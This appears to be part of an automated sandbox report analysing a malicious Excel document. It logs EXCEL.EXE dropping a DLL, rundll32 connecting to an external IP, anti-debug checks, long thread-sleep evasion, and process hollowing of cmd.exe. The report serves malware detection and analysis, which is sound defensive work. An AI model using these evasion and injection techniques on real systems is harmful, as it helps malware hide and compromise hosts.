Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6734EEC4 push es; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6734CAEC push ebx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6734E143 push ecx; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_673A069F push dword ptr [edi]; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_673A2992 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_673A1CCC push edx; iretd
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\bsdnbsej.dbw

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\bsdnbsej.dbw
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 245481
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 248977
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 308250
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 276112
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 453874
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 564679
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 198282
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 295626
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 465541
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -245481s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -248977s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -308250s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -276112s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -84184s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -453874s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -59831s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -564679s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -51978s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -198282s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -295626s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -58419s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -465541s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -102944s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -55018s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_67335D36 FindFirstFileExW,
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 245481
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 248977
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 308250
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 276112
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 84184
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 453874
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 59831
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 564679
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 51978
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 198282
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 295626
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 58419
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 465541
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 102944
Source: C:\Windows\SysWOW64\cmd.exe Thread delayed: delay time: 55018
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_673337A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_67332A8C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_67335960 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_6739FEC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_6739FDF8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_6739F9FF push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_67323E56 __EH_prolog3_GS,__fassign,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,__fassign,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_673337A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_6732A7E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_6732A9E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.222.240.99 187
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 11D0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D0000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\rundll32.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11FF000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 120A000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 120C000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 120D000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1011
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1068
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D106C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1072
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D107C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1082
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1087
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1091
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1097
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D109B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D10FC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1100
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1106
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1110
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1116
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D111B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1125
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D112B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D112F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1184
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1188
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D118E
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1198
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D119E
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D11A3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D11AD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D11B3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D11B7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1210
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1214
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D121A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1224
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D122A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D122F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1239
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D123F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1243
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12CB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12CF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12D6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12E6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12EB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12F5
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12FB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D12FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1350
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1354
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D135A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1364
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D136A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D136F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1379
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D137F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1383
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D141B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D141F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1426
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1430
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1436
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D143B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1445
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D144B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D144F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14A4
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14A8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14AE
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14B8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14BE
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14C3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14CD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14D3
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D14D7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1538
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D153C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1542
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D154C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1552
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1557
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1561
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1567
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D156B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15C8
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15CC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15D2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15DC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15E2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15E7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15F1
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15F7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D15FB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1616
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1623
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1641
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D164C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D16FA
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1700
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1706
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D179A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D17A0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D17A6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D193E
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1944
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D194A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D197A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A31
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A36
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A3C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A4B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A54
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1AE0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1B30
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1BFD
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1C03
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1C09
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E19
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E1F
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E60
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2125
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D212B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2131
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D220A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2210
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2216
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D22C0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D22C6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D22CC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2375
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D237B
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2381
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D243C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2442
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2448
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D25A7
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D25DC
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2601
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2607
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2677
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D267D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D26CB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D26D2
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D26DB
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D26FE
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2704
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D276D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2773
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D27C0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D27C6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D280A
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2847
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D284D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D28A0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D28A6
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D28EA
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D290D
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2913
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2980
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2986
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D29CA
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D29E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A09
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D2A0F
